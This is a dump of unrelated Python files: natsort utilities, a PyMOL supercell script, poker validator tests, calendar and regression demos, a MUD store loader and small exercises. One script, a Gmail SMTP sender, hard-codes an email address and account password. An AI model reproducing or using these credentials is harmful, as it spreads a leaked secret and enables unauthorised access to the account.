            fout2.write(k+'\t\t'+v+'\t\t'+str(sentiment_value[k])+'\n')
end=time.clock()
print("The total time is "+str(end-start)+" secs...")
|
'''
Created on 2012-4-21
@author: Sky
'''
from SimpleMUD.EntityDatabase import EntityDatabase
from BasicLib.BasicLibString import ParseWord
from SimpleMUD.Store import Store
from BasicLib.BasicLibLogger import USERLOG
class StoreDatabase(EntityDatabase):
    """Entity database holding every Store listed under "StoreList"."""

    def Load(self):
        """Populate m_map with one Store per id found in "StoreList".

        EntityDatabase.Sr exposes llen/lindex - presumably a redis-style
        client (confirm). Always returns True.
        """
        sr = EntityDatabase.Sr
        for slot in range(sr.llen("StoreList")):
            store_id = sr.lindex("StoreList", slot)
            store = Store()
            store.SetId(store_id)
            store.Load(sr)
            self.m_map[store_id] = store
            USERLOG.Log("Loaded Store: " + store.GetName())
        return True


# Module-level singleton used by the rest of the MUD code
storeDatabase = StoreDatabase()
|
#
# Example file for working with Calendars
#
# import the calendar module
import calendar
# create a plain text calendar
# Plain-text calendar with weeks starting on Monday
c = calendar.TextCalendar(calendar.MONDAY)
string = c.formatmonth(1992, 2, 0, 0)
print(string)

# The same month rendered as HTML, weeks starting on Sunday
hc = calendar.HTMLCalendar(calendar.SUNDAY)
string = hc.formatmonth(1992, 2)
print(string)

# Day-by-day iteration; zero marks days belonging to a neighbouring month
for i in c.itermonthdays(1992, 2):
    print(i)

# Locale-aware month and day names, full form
for name in calendar.month_name:
    print(name)
for day in calendar.day_name:
    print(day)

# Rule-based dates: the first Friday of every month of 2020. It must fall
# in one of the first two weeks returned by monthcalendar(), whose rows
# are weeks (Monday-first) with zeros for days outside the month.
print("Team meetings will be on: ")
for m in range(1, 13):
    cal = calendar.monthcalendar(2020, m)
    weekone = cal[0]
    weektwo = cal[1]
    # A zero in week one means the month started after Friday,
    # so the first Friday lands in week two.
    meetday = weekone[calendar.FRIDAY] or weektwo[calendar.FRIDAY]
    print("%10s %2d" % (calendar.month_name[m], meetday))
# false.py
# A program to output whether a statement is true or false
# Author: Andy Walker
# these lines get the input
# Read the two integers to compare (raises ValueError on non-numeric input)
firstNumber = int(input("Please enter the first number: "))
print ("The first number is {}".format(firstNumber))
secondNumber = int(input("Please enter the second number: "))
print ("The second number is {}".format(secondNumber))
# Echo the equality test; format() renders the boolean as True/False
print ("Are the numbers the same? \n{}".format(firstNumber == secondNumber))
__title__ = "Optimum polynomial"
def solve():
    """Build the finite-difference grid of u(n) and sum every row.

    u(n) = 1 - n + n^2 - ... + n^10 evaluated at n = 1..10; each further
    grid row holds the successive differences of the previous row.

    :return: the sum of all values in the grid
    """
    from common import log

    # Polynomial coefficients, lowest power first
    param = [1, -1, 1, -1, 1, -1, 1, -1, 1, -1, 1]
    #param = [0, 0, 0, 1]

    def u(n):
        """Evaluate the polynomial at n by accumulating powers."""
        total = 0
        power = 1
        for coeff in param:
            total += power * coeff
            power *= n
        return total

    def get_next_seq(seq):
        """Forward differences of *seq* (one element shorter)."""
        return [seq[i] - seq[i - 1] for i in range(1, len(seq))]

    # list() so the sequence is indexable: on Python 3 map() returns an
    # iterator, and the seq[i-1] below would fail without it (no-op on
    # Python 2, where map() already returns a list).
    seq = list(map(u, range(1, len(param))))
    for i in range(1, len(param)):
        log("u(%02d) = %d" % (i, seq[i - 1]))
    grid = [seq]
    log(seq)
    for i in range(0, len(seq) - 1):
        grid.append(get_next_seq(grid[i]))
        log(grid[i + 1])
    return sum(sum(row) for row in grid)
|
# -*- coding: utf-8 -*-
"""
Natsort can sort strings with numbers in a natural order.
It provides the natsorted function to sort strings with
arbitrary numbers.
You can mix types with natsorted. This can get around the new
'unorderable types' issue with Python 3. Natsort will recursively
descend into lists of lists so you can sort by the sublist contents.
See the README or the natsort homepage for more details.
"""
from __future__ import print_function, division, unicode_literals, absolute_import
import re
import sys
from operator import itemgetter
from numbers import Number
from itertools import islice
from .py23compat import u_format, py23_basestring, py23_range, py23_str, py23_zip
__doc__ = u_format(__doc__) # Make sure the doctest works for either python2 or python3
# The regexes that locate floats (with/without sign, with/without exponent).
# Each has a single capture group so re.split keeps the matched number.
float_sign_exp_re = re.compile(r'([-+]?\d*\.?\d+(?:[eE][-+]?\d+)?)')
float_nosign_exp_re = re.compile(r'(\d*\.?\d+(?:[eE][-+]?\d+)?)')
float_sign_noexp_re = re.compile(r'([-+]?\d*\.?\d+)')
float_nosign_noexp_re = re.compile(r'(\d*\.?\d+)')
# Integer regexes
int_nosign_re = re.compile(r'(\d+)')
int_sign_re = re.compile(r'([-+]?\d+)')
# This dict will help select the correct regex and number conversion function.
# Keys are (number_type, signed, exp); the exp flag only matters for float,
# and None behaves as unsigned int (digits only).
regex_and_num_function_chooser = {
    (float, True, True) : (float_sign_exp_re, float),
    (float, True, False) : (float_sign_noexp_re, float),
    (float, False, True) : (float_nosign_exp_re, float),
    (float, False, False) : (float_nosign_noexp_re, float),
    (int, True, True) : (int_sign_re, int),
    (int, True, False) : (int_sign_re, int),
    (int, False, True) : (int_nosign_re, int),
    (int, False, False) : (int_nosign_re, int),
    (None, True, True) : (int_nosign_re, int),
    (None, True, False) : (int_nosign_re, int),
    (None, False, True) : (int_nosign_re, int),
    (None, False, False) : (int_nosign_re, int),
}
def _remove_empty(s):
"""Remove empty strings from a list."""
while True:
try:
s.remove('')
except ValueError:
break
return s
def _number_finder(s, regex, numconv, py3_safe):
    """Split *s* on *regex* and convert the numeric pieces with *numconv*."""
    # Split. A single part means no number was found.
    parts = regex.split(s)
    if len(parts) == 1:
        return tuple(parts)

    # Convert numeric chunks, leaving everything else as strings
    parts = _remove_empty(parts)
    for i in py23_range(len(parts)):
        try:
            parts[i] = numconv(parts[i])
        except ValueError:
            pass

    # A leading number gets an empty string prepended so mixed tuples stay
    # orderable on Python 3. _py3_safe additionally pads between adjacent
    # numbers for the complex cases; it is opt-in because it is expensive.
    if isinstance(parts[0], py23_basestring):
        return _py3_safe(parts) if py3_safe else parts
    padded = [''] + parts
    return _py3_safe(padded) if py3_safe else padded
def _py3_safe(parsed_list):
    """Insert '' between adjacent numbers so tuples stay comparable on Py3."""
    if len(parsed_list) < 2:
        return parsed_list
    result = [parsed_list[0]]
    # Walk consecutive (previous, current) pairs
    for prev, curr in py23_zip(islice(parsed_list, 0, len(parsed_list) - 1),
                               islice(parsed_list, 1, None)):
        if isinstance(prev, Number) and isinstance(curr, Number):
            result.append("")
        result.append(curr)
    return result
@u_format
def natsort_key(s, number_type=float, signed=True, exp=True, py3_safe=False):
    """\
    Key to sort strings and numbers naturally, not lexicographically.
    It is designed for use in passing to the 'sorted' builtin or
    'sort' attribute of lists.
    s
        The value used by the sorting algorithm
    number_type (None, float, int)
        The types of number to sort on: float searches for floating point
        numbers, int searches for integers, and None searches for digits
        (like integers but does not take into account negative sign).
        None is a shortcut for number_type = int and signed = False.
    signed (True, False)
        By default a '+' or '-' before a number is taken to be the sign
        of the number. If signed is False, any '+' or '-' will not be
        considered to be part of the number, but as part of the string.
    exp (True, False)
        This option only applies to number_type = float. If exp = True,
        a string like "3.5e5" will be interpreted as 350000, i.e. the
        exponential part is considered to be part of the number.
        If exp = False, "3.5e5" is interpreted as (3.5, "e", 5).
        The default behavior is exp = True.
    py3_safe (True, False)
        This will make the string parsing algorithm be more careful by
        placing an empty string between two adjacent numbers after the
        parsing algorithm. This will prevent the "unorderable types" error.
    returns
        The modified value with numbers extracted.
    Using natsort_key is just like any other sorting key in python
    >>> a = ['num3', 'num5', 'num2']
    >>> a.sort(key=natsort_key)
    >>> a
    [{u}'num2', {u}'num3', {u}'num5']
    It works by separating out the numbers from the strings
    >>> natsort_key('num2')
    ({u}'num', 2.0)
    If you need to call natsort_key with the number_type argument, or get a special
    attribute or item of each element of the sequence, the easiest way is to make a
    lambda expression that calls natsort_key::
    >>> from operator import itemgetter
    >>> a = [['num4', 'b'], ['num8', 'c'], ['num2', 'a']]
    >>> f = itemgetter(0)
    >>> a.sort(key=lambda x: natsort_key(f(x), number_type=int))
    >>> a
    [[{u}'num2', {u}'a'], [{u}'num4', {u}'b'], [{u}'num8', {u}'c']]
    Iterables are parsed recursively so you can sort lists of lists.
    >>> natsort_key(('a1', 'a10'))
    (({u}'a', 1.0), ({u}'a', 10.0))
    Strings that lead with a number get an empty string at the front of the tuple.
    This is designed to get around the "unorderable types" issue of Python3.
    >>> natsort_key('15a')
    ({u}'', 15.0, {u}'a')
    You can give bare numbers, too.
    >>> natsort_key(10)
    ({u}'', 10)
    If you have a case where one of your string has two numbers in a row
    (only possible with "5+5" or "5-5" and signed=True to my knowledge), you
    can turn on the "py3_safe" option to try to add a "" between sets of two
    numbers.
    >>> natsort_key('43h7+3', py3_safe=True)
    ({u}'', 43.0, {u}'h', 7.0, {u}'', 3.0)
    """
    # If we are dealing with non-strings, return now: sequences are keyed
    # recursively (with default options), scalars are wrapped as ('', s) so
    # they compare cleanly against the string-led tuples made for strings.
    if not isinstance(s, py23_basestring):
        if hasattr(s, '__getitem__'):
            return tuple(natsort_key(x) for x in s)
        else:
            return ('', s,)
    # Convert to the proper tuple and return.  The chooser table maps the
    # (number_type, signed, exp) combination to (regex, converter).
    inp_options = (number_type, signed, exp)
    try:
        args = (s,) + regex_and_num_function_chooser[inp_options] + (py3_safe,)
    except KeyError:
        # Report errors properly
        if number_type not in (float, int) and number_type is not None:
            raise ValueError("natsort_key: 'number_type' "
                             "parameter '{0}' invalid".format(py23_str(number_type)))
        elif signed not in (True, False):
            raise ValueError("natsort_key: 'signed' "
                             "parameter '{0}' invalid".format(py23_str(signed)))
        elif exp not in (True, False):
            raise ValueError("natsort_key: 'exp' "
                             "parameter '{0}' invalid".format(py23_str(exp)))
        # NOTE(review): if the KeyError fires but none of the checks above
        # trip, this falls through and implicitly returns None — confirm the
        # chooser table covers every valid option combination.
    else:
        return tuple(_number_finder(*args))
@u_format
def natsorted(seq, key=lambda x: x, number_type=float, signed=True, exp=True):
    """\
    Sorts a sequence naturally (alphabetically and numerically),
    not lexicographically.
    seq (iterable)
        The sequence to sort.
    key (function)
        A key used to determine how to sort each element of the sequence.
    number_type (None, float, int)
        The types of number to sort on: float searches for floating point
        numbers, int searches for integers, and None searches for digits
        (like integers but does not take into account negative sign).
        None is a shortcut for number_type = int and signed = False.
    signed (True, False)
        By default a '+' or '-' before a number is taken to be the sign
        of the number. If signed is False, any '+' or '-' will not be
        considered to be part of the number, but as part of the string.
    exp (True, False)
        This option only applies to number_type = float. If exp = True,
        a string like "3.5e5" will be interpreted as 350000, i.e. the
        exponential part is considered to be part of the number.
        If exp = False, "3.5e5" is interpreted as (3.5, "e", 5).
        The default behavior is exp = True.
    returns
        The sorted sequence.
    Use natsorted just like the builtin sorted
    >>> a = ['num3', 'num5', 'num2']
    >>> natsorted(a)
    [{u}'num2', {u}'num3', {u}'num5']
    """
    def _natural_key(element, _safe=False):
        # Build the natural-sort key, optionally in "py3 safe" mode.
        return natsort_key(key(element), number_type=number_type,
                           signed=signed, exp=exp, py3_safe=_safe)
    try:
        return sorted(seq, key=_natural_key)
    except TypeError as e:
        # "unorderable types" can still slip through on Python 3; retry with
        # the more careful (and more expensive) py3_safe parsing.  Anything
        # else is a genuine error and is re-raised unchanged.
        if 'unorderable types' not in str(e):
            raise
        return sorted(seq, key=lambda element: _natural_key(element, _safe=True))
@u_format
def versorted(seq, key=lambda x: x):
    """\
    Convenience function to sort version numbers. This is a wrapper
    around natsorted(seq, number_type=None).
    seq (iterable)
        The sequence to sort.
    key (function)
        A key used to determine how to sort each element of the sequence.
    returns
        The sorted sequence.
    Use versorted just like the builtin sorted
    >>> a = ['num4.0.2', 'num3.4.1', 'num3.4.2']
    >>> versorted(a)
    [{u}'num3.4.1', {u}'num3.4.2', {u}'num4.0.2']
    """
    # Version strings sort correctly as runs of unsigned digits, which is
    # exactly what number_type=None selects in natsorted.
    return natsorted(seq, key=key, number_type=None)
@u_format
def index_natsorted(seq, key=lambda x: x, number_type=float, signed=True, exp=True):
    """\
    Sorts a sequence naturally, but returns a list of sorted the
    indexes and not the sorted list.
    seq (iterable)
        The sequence to sort.
    key (function)
        A key used to determine how to sort each element of the sequence.
    number_type (None, float, int)
        The types of number to sort on: float searches for floating point
        numbers, int searches for integers, and None searches for digits
        (like integers but does not take into account negative sign).
        None is a shortcut for number_type = int and signed = False.
    signed (True, False)
        By default a '+' or '-' before a number is taken to be the sign
        of the number. If signed is False, any '+' or '-' will not be
        considered to be part of the number, but as part of the string.
    exp (True, False)
        This option only applies to number_type = float. If exp = True,
        a string like "3.5e5" will be interpreted as 350000, i.e. the
        exponential part is considered to be part of the number.
        If exp = False, "3.5e5" is interpreted as (3.5, "e", 5).
        The default behavior is exp = True.
    returns
        The ordered indexes of the sequence.
    Use index_natsorted if you want to sort multiple lists by the sort order of
    one list:
    >>> from natsort import index_natsorted
    >>> a = ['num3', 'num5', 'num2']
    >>> b = ['foo', 'bar', 'baz']
    >>> index = index_natsorted(a)
    >>> index
    [2, 0, 1]
    >>> # Sort both lists by the sort order of a
    >>> [a[i] for i in index]
    [{u}'num2', {u}'num3', {u}'num5']
    >>> [b[i] for i in index]
    [{u}'baz', {u}'foo', {u}'bar']
    """
    # Decorate each element with its original index, sort the pairs by the
    # element's natural-sort key, then read the indexes back out.
    decorated = [[position, key(element)] for position, element in enumerate(seq)]
    def _pair_key(pair, _safe=False):
        return natsort_key(pair[1], number_type=number_type,
                           signed=signed, exp=exp, py3_safe=_safe)
    try:
        decorated.sort(key=_pair_key)
    except TypeError as e:
        # Retry in py3_safe mode only for the "unorderable types" failure;
        # re-raise anything else unchanged.
        if 'unorderable types' not in str(e):
            raise
        decorated.sort(key=lambda pair: _pair_key(pair, _safe=True))
    return [pair[0] for pair in decorated]
@u_format
def index_versorted(seq, key=lambda x: x):
    """\
    Convenience function to sort version numbers but return the
    indexes of how the sequence would be sorted.
    This is a wrapper around index_natsorted(seq, number_type=None).
    seq (iterable)
        The sequence to sort.
    key (function)
        A key used to determine how to sort each element of the sequence.
    returns
        The ordered indexes of the sequence.
    Use index_versorted just like the builtin sorted
    >>> a = ['num4.0.2', 'num3.4.1', 'num3.4.2']
    >>> index_versorted(a)
    [1, 2, 0]
    """
    # Same delegation trick as versorted: number_type=None gives version-style
    # (unsigned digit run) parsing.
    return index_natsorted(seq, key=key, number_type=None)
|
# Simple change calculator: read the bill total and the cash handed over,
# then report how much change is due.
total_cost = int(input("Total cost:"))
received = int(input("Money received:"))
# Fixed the user-facing typo "doller" -> "dollars".
print("You will get {} dollars back".format(received - total_cost))
|
import unittest
from poker.card import Card
from poker.validators import StraightFlushValidator
class TestStraightFlushValidator(unittest.TestCase):
    """Tests for StraightFlushValidator.

    Note: the two test methods used to share the name
    ``test_straigh_flush_is_not_valid``; the second definition silently
    shadowed the first, so the negative test never ran. They now have
    distinct (and correctly spelled) names.
    """

    def test_straight_flush_is_not_valid(self):
        '''
        A straight flush occurs when all ranks are sequential and the
        suite is the same; here the sequential run mixes suites.
        '''
        cards = [
            Card(rank = "3", suite = "clubs"),
            Card(rank = "4", suite = "hearts"),
            Card(rank = "5", suite = "hearts"),
            Card(rank = "6", suite = "hearts"),
            Card(rank = "7", suite = "hearts"),
            Card(rank = "8", suite = "clubs"),
            Card(rank = "King", suite = "hearts")
        ]
        validator = StraightFlushValidator(cards = cards)
        self.assertEqual(
            validator.is_valid(),
            False
        )

    def test_straight_flush_is_valid(self):
        '''
        A straight flush occurs when all ranks are sequential and the
        suite is the same; 4-8 of hearts qualifies.
        '''
        cards = [
            Card(rank = "4", suite = "hearts"),
            Card(rank = "5", suite = "hearts"),
            Card(rank = "6", suite = "hearts"),
            Card(rank = "7", suite = "hearts"),
            Card(rank = "8", suite = "hearts"),
            Card(rank = "King", suite = "hearts")
        ]
        validator = StraightFlushValidator(cards = cards)
        self.assertEqual(
            validator.is_valid(),
            True
        )

    def test_valid_cards(self):
        '''valid_cards() returns only the cards forming the straight flush.'''
        cards = [
            Card(rank = "4", suite = "hearts"),
            Card(rank = "5", suite = "hearts"),
            Card(rank = "6", suite = "hearts"),
            Card(rank = "7", suite = "hearts"),
            Card(rank = "8", suite = "hearts"),
            Card(rank = "King", suite = "hearts")
        ]
        validator = StraightFlushValidator(cards = cards)
        self.assertEqual(
            validator.valid_cards(),
            [
                Card(rank = "4", suite = "hearts"),
                Card(rank = "5", suite = "hearts"),
                Card(rank = "6", suite = "hearts"),
                Card(rank = "7", suite = "hearts"),
                Card(rank = "8", suite = "hearts"),
            ]
        )
# Decision Tree Regression
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeRegressor, plot_tree
from sklearn.metrics import r2_score
# Importing the dataset
# Importing the dataset (first 5000 rows to keep the download manageable)
df = pd.read_csv('https://query.data.world/s/rjfb64km2adpnnrglujstxylw3wanb', nrows=5000)
# Extract the two columns we model: total experience -> salary
data = df[['experience_total', 'salary']]
# Checking for missing data
print("The missing data \n {} ".format(data.isnull().sum()))
# Dropping the rows with missing data
data = data.dropna(how='any')
# Splitting into feature matrix X and target Y (kept 2-D for sklearn)
X = data.iloc[:, 0:1].values
Y = data.iloc[:, 1:2].values
# Splitting data into train and test sets
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.3, random_state=0)
# Fitting the decision-tree regressor
dt = DecisionTreeRegressor(max_depth=4, random_state=0)
dt.fit(X_train, Y_train)
# Plotting the training results on a fine grid.
# Use scalar .min()/.max(): builtin min()/max() on a 2-D array return row
# arrays, which np.arange only accepted via a deprecated code path.
X_grid = np.arange(X_train.min(), X_train.max(), 0.01)
X_grid = X_grid.reshape((len(X_grid), 1))
plt.scatter(X_train, Y_train, color='red')
plt.plot(X_grid, dt.predict(X_grid), color='blue')
plt.title('DT')
plt.xlabel('Experience')
plt.ylabel('Salary')
plt.show()
# Accuracy (R^2 score on the held-out test set)
print("The accuracy of the model is : ", r2_score(Y_test, dt.predict(X_test)))
# Plotting the tree structure in its own figure; without the trailing show()
# the tree was never actually rendered when run as a script.
plt.figure()
plot_tree(dt, filled=True)
plt.show()
'''
(c) 2010 Thomas Holder
PyMOL python script (load with `run supercell.py`)
Usage: See "help supercell" and "help symexpcell"
'''
from pymol import cmd, cgo, xray
from math import cos, sin, radians, sqrt
import numpy
def cellbasis(angles, edges):
	'''
	For the unit cell with given angles (degrees) and edge lengths calculate
	the basis transformation (vectors) as columns of a 4x4 numpy.array
	'''
	rad = [radians(i) for i in angles]
	basis = numpy.identity(4)
	basis[0][1] = cos(rad[2])
	basis[1][1] = sin(rad[2])
	basis[0][2] = cos(rad[1])
	basis[1][2] = (cos(rad[0]) - basis[0][1]*basis[0][2])/basis[1][1]
	basis[2][2] = sqrt(1 - basis[0][2]**2 - basis[1][2]**2)
	# Scale column j of the basis by edge length j (homogeneous column by 1).
	# Build the scale vector locally instead of edges.append(1.0), which used
	# to mutate the caller's list as a side effect (and failed on tuples).
	scale = list(edges) + [1.0]
	return basis * scale  # element-wise broadcast: column j scaled by scale[j]
def supercell(a=1, b=1, c=1, object=None, color='blue', name='supercell', withmates=1,prefix="m",center=0,transformation=None,cutoff=None):
	'''
DESCRIPTION
	Draw a supercell, as requested by Nicolas Bock on the pymol-users
	mailing list (Subject: [PyMOL] feature request: supercell construction
	Date: 04/12/2010 10:12:17 PM (Mon, 12 Apr 2010 14:12:17 -0600))
USAGE
	supercell a, b, c [, object [, color [, name [, withmates]]]]
ARGUMENTS
	a, b, c = integer: repeat cell in x,y,z direction a,b,c times
	{default: 1,1,1}
	object = string: name of object to take cell definition from
	color = string: color of cell {default: blue}
	name = string: name of the cgo object to create {default: supercell}
	withmates = bool: also create symmetry mates in displayed cells
	{default: 1}
	prefix = string: prefix for the symmetry mates {default: m}
	center = boolean: If 1, indicates that the lattice should be centered on the
	origin, as opposed to having the corner at the origin cell. {default: 0}
	transformation = list: a 16-element list giving the 4x4 transformation
	matrix, as described in get_object_matrix() {default: identity matrix}
	cutoff = int: restrict symmetry mates to within cutoff angstroms of the origin.
	Use 0 to generate all symmetry mates. {default: 0}
SEE ALSO
	show cell
	cmd
	'''
	if object is None:
		object = cmd.get_object_list()[0]
	withmates = int(withmates)
	# Unit cell parameters come from the object's crystallographic symmetry.
	sym = cmd.get_symmetry(object)
	if sym is None:
		print("No symmetry operators found")
		return
	cell_edges = sym[0:3]
	cell_angles = sym[3:6]
	basis = cellbasis(cell_angles, cell_edges)
	if transformation is not None:
		transmat = transformation_to_numpy(transformation)
	assert isinstance(basis, numpy.ndarray)
	# ts collects the integer lattice offsets of every cell to draw.
	ts = list()
	a = int(a)
	b = int(b)
	c = int(c)
	if int(center) == 0:
		astart = 0
		bstart = 0
		cstart = 0
	else:
		#TODO Maybe would be more useful to center at the asymmetric unit?
		# For now, center on the origin cell.
		# NOTE(review): (1-a)/2 relies on Python 2 integer division; under
		# Python 3 this produces a float and range() below would raise.
		astart = (1-a)/2
		bstart = (1-b)/2
		cstart = (1-c)/2
	for i in range( astart,astart+a ):
		for j in range( bstart,bstart+b ):
			for k in range( cstart,cstart+c ):
				ts.append([i,j,k])
	# Build one CGO line set for all cell outlines.
	obj = [
		cgo.BEGIN,
		cgo.LINES,
		cgo.COLOR,
	]
	obj.extend(cmd.get_color_tuple(color))
	for t in ts:
		# draw bounding box around cell t
		# Element-wise product then column sum == basis[0:3,0:3] dot t,
		# i.e. the Cartesian translation of lattice offset t.
		shift = basis[0:3,0:3] * t
		shift = shift[:,0] + shift[:,1] + shift[:,2]
		for i in range(3):
			# vi is direction of the edges to draw
			vi = basis[0:3,i]
			# vj are starting points for the four edges in that direction
			vj = [
				numpy.array([0.,0.,0.]),
				basis[0:3,(i+1)%3],
				basis[0:3,(i+2)%3],
				basis[0:3,(i+1)%3] + basis[0:3,(i+2)%3]
			]
			for j in range(4):
				start = shift + vj[j]
				end = start + vi
				if transformation is not None:
					# Apply the extra 4x4 transform in homogeneous coordinates.
					start = numpy.dot(transmat, numpy.append(start,1))[:3]
					end = numpy.dot(transmat, numpy.append(end ,1))[:3]
				obj.append(cgo.VERTEX)
				obj.extend(start.tolist())
				obj.append(cgo.VERTEX)
				obj.extend(end.tolist())
		if withmates:
			# Populate this cell with symmetry mates as well.
			symexpcell('%s%d%d%d_' % (prefix,t[0]-astart,t[1]-bstart,t[2]-cstart), object, *t,transformation=transformation,cutoff=cutoff)
	obj.append(cgo.END)
	cmd.delete(name)
	cmd.load_cgo(obj, name)
def symexpcell(prefix='mate', object=None, a=0, b=0, c=0,transformation=None,cutoff=None):
	'''
DESCRIPTION
	Creates all symmetry-related objects for the specified object that
	occur with their bounding box center within the unit cell.
USAGE
	symexpcell prefix, object, [a, b, c]
ARGUMENTS
	prefix = string: prefix of new objects
	object = string: object for which to create symmetry mates
	a, b, c = integer: create neighboring cell {default: 0,0,0}
	transformation = list: list of 16 floats giving the transformation matrix
	to apply to the generated symmetry mates {default: identity matrix}
	cutoff = int: restrict symmetry mates to within cutoff angstroms of the origin.
	Use 0 to generate all symmetry mates. {default: 0}
SEE ALSO
	symexp, http://www.pymolwiki.org/index.php/SuperSym
	'''
	#print "symexpcell %s,%s,%d,%d,%d,%s"%(prefix,object,int(a),int(b),int(c),transformation)
	if object is None:
		object = cmd.get_object_list()[0]
	if cutoff is not None:
		# cutoff <= 0 means "no distance restriction".
		cutoff = int(cutoff)
		if cutoff <= 0: cutoff = None
	sym = cmd.get_symmetry(object)
	cell_edges = sym[0:3]
	cell_angles = sym[3:6]
	spacegroup = sym[6]
	basis = cellbasis(cell_angles, cell_edges)
	# Bounding-box center of the object, as a homogeneous (4,1) column.
	extent = cmd.get_extent(object)
	center = sum(numpy.array(extent)) * 0.5
	center = numpy.append(center,1.0).reshape(4,1)
	# NOTE(review): `*` on plain ndarrays is element-wise with broadcasting;
	# this line reads like it expects matrix multiplication (numpy.matrix
	# semantics) — compare the explicit numpy.dot calls below. Verify the
	# fractional-coordinate math before relying on this.
	center_cell = numpy.linalg.inv(basis) * center
	extra_shift = numpy.array([[float(i)] for i in (a,b,c)])
	origin = numpy.array([[0,0,0,1]]).T
	if transformation is not None:
		transmat = transformation_to_numpy(transformation)
		#print "%s\n*\n%s\n=\n%s\n" % (origin,transmat,
		#	numpy.dot(numpy.linalg.inv(transmat),origin) )
		# Compare distances in the un-transformed frame.
		origin = numpy.dot(numpy.linalg.inv(transmat),origin)
	i = 0
	matrices = xray.sg_sym_to_mat_list(spacegroup)
	for mat in matrices:
		i += 1
		mat = numpy.array(mat)
		# Shift each mate so its center lands inside the requested cell.
		shift = numpy.floor(numpy.dot(mat, center_cell))
		mat[0:3,3] -= shift[0:3,0]
		mat[0:3,3] += extra_shift[0:3,0]
		# Change of basis: fractional symmetry operator -> Cartesian.
		mat = numpy.dot(numpy.dot(basis, mat), numpy.linalg.inv(basis) )
		mat_list = list(mat.flat)
		new_center = numpy.dot(mat,center)
		#print "%s\n* (%d)\n%s\n=\n%s\n" % (center,i,mat, new_center)
		if cutoff is not None:
			# Squared-distance comparison avoids the sqrt.
			dist = new_center - origin
			dist = numpy.dot(dist.T,dist)
			if dist > cutoff**2:
				#print "Skipping %d%d%d_%d at distance %f" % (a,b,c,i,sqrt(dist))
				continue
		name = '%s%d' % (prefix, i)
		cmd.create(name, object)
		cmd.transform_object(name, mat_list)
		# Apply extra transformation afterwards
		if transformation is not None:
			cmd.transform_object(name, transformation)
		cmd.color(i+1, name)
# Register both functions as interactive PyMOL commands.
cmd.extend('symexpcell', symexpcell)
cmd.extend('supercell', supercell)
def transformation_to_numpy(transformation):
	"""Convert a 16-element transformation list into a 4x4 numpy array.

	Prints a message and returns None when the input does not have exactly
	16 elements.
	"""
	if len(transformation) != 16:
		# print() call form: the old Python-2 print statement was a
		# SyntaxError under Python 3, which the rest of this script targets.
		print("Invalid transformation. Expect 16-element transformation matrix, found %d."%len(transformation))
		return None
	mat = numpy.array(transformation).reshape(4,4)
	return mat
def numpy_to_transformation(mat):
	"""Flatten a 4x4 numpy array back into the flat-list transformation form."""
	flattened = mat.flatten()
	return flattened.tolist()
# tab-completion of arguments
# (argument slot 3 of `supercell` — the object name — completes over objects)
cmd.auto_arg[3]['supercell'] = [ cmd.object_sc, 'object', '']
# vim:ts=4 sw=4 noet
|
import smtplib, ssl, sys

smtp_server = "smtp.gmail.com"
port = 587  # Submission port: plain connection upgraded via STARTTLS (implicit SSL would be 465)
# SECURITY: credentials are hard-coded in source; move them to environment
# variables or a secrets store before committing or sharing this script.
sender_email = "wifiologyproject@gmail.com"
password = "Wifi1234-"
receiver_email = "wifiologyproject@gmail.com"
message = """\
Subject: Hi there
This message is sent from Python."""
# Create a secure SSL context
context = ssl.create_default_context()
with smtplib.SMTP(smtp_server, port) as server:
    server.ehlo()  # Can be omitted
    # Pass the context so certificate validation actually uses it; previously
    # the context was created but never supplied to starttls().
    server.starttls(context=context)
    server.ehlo()  # Can be omitted
    server.login(sender_email, password)
    server.sendmail(sender_email, receiver_email, message)
import random
import functools
import os
import termcolor
class FileAdapter():
    """Reads a file's lines once and caches them per instance."""

    def __init__(self, file_name):
        self.file_name = file_name
        # Per-instance cache. This replaces @functools.lru_cache(maxsize=1)
        # on readlines(): that cache keyed on `self`, kept instances alive,
        # and with maxsize=1 was evicted every time a different adapter read
        # its file, defeating caching when several adapters are in use.
        self._cached_lines = None

    def readlines(self):
        """Return the file's lines, reading the file at most once."""
        if self._cached_lines is None:
            with open(self.file_name, "r") as f:
                self._cached_lines = self._safe_readlines(f)
        return self._cached_lines

    def _safe_readlines(self, file):
        """Read all lines from an open file, returning [] on I/O errors."""
        try:
            return file.readlines()
        except IOError as e:
            print(termcolor.colored(f"Error while reading from {self.file_name}: {str(e)}", "magenta"))
            return list()
class FilesInputStream():
    """Aggregates several FileAdapters and streams their lines."""

    def __init__(self):
        self.file_adapters = list()

    def add_file(self, file_name):
        """Register a file; warns (but still registers) when it is missing."""
        if(not os.path.exists(file_name)):
            print(termcolor.colored(f"WARNING: Couldnt open {file_name}. File does not exists!", "magenta")) #TODO:Logging
            # NOTE(review): the adapter is still appended below even when the
            # file is missing; reading it later will raise — confirm intended.
        self.file_adapters.append(FileAdapter(file_name))

    def get_lines(self, limit=None):
        """Yield stripped lines from all files, at most `limit` lines total."""
        line_counter = 0
        for file_adapter in self.file_adapters:
            for line in file_adapter.readlines():
                if(limit is not None and line_counter>=limit):
                    # `return` instead of the old `break`: breaking only the
                    # inner loop still opened and fully read every remaining
                    # file even though the limit was already reached.
                    return
                line_counter+=1
                yield line.replace('\n', '').strip()

    def get_randomized_lines(self, limit=None):
        """Yield up to `limit` lines in a random order."""
        lines = list(self.get_lines(limit=limit))
        random.shuffle(lines)
        for line in lines:
            yield line

    def get_random_line(self):
        """Return one uniformly random line (raises ValueError if empty)."""
        lines = list(self.get_lines())
        index = random.randint(0, len(lines)-1)
        return lines[index]

    @functools.cached_property
    def lines_count(self):
        """Total number of lines across all files (computed once, then cached)."""
        return len(list(self.get_lines()))
import time
def timeofday():
    """Prints current time of day in 24 hour format,
    along with days since 1st Jan 1970.
    """
    now = int(time.time())  # whole seconds since the Unix epoch
    # Peel the clock fields off with successive divmod steps.
    total_minutes, secs = divmod(now, 60)
    total_hours, mins = divmod(total_minutes, 60)
    day_count, hrs = divmod(total_hours, 24)
    print('(days since epoch =' + str(day_count)
          + ', current time = ' + zeropad(str(hrs))
          + ':' + zeropad(str(mins))
          + ':' + zeropad(str(secs)) + ')')
def zeropad(s):
    """Pads a one digit integer presented as a string with a zero in the front.
    Leaves other integers as they are."""
    return '0' + s if len(s) == 1 else s
# Ad-hoc smoke test for zeropad, followed by one live call to timeofday.
print('8')
print(len('8'))
print(zeropad('24'))
print(zeropad('8'))
timeofday()
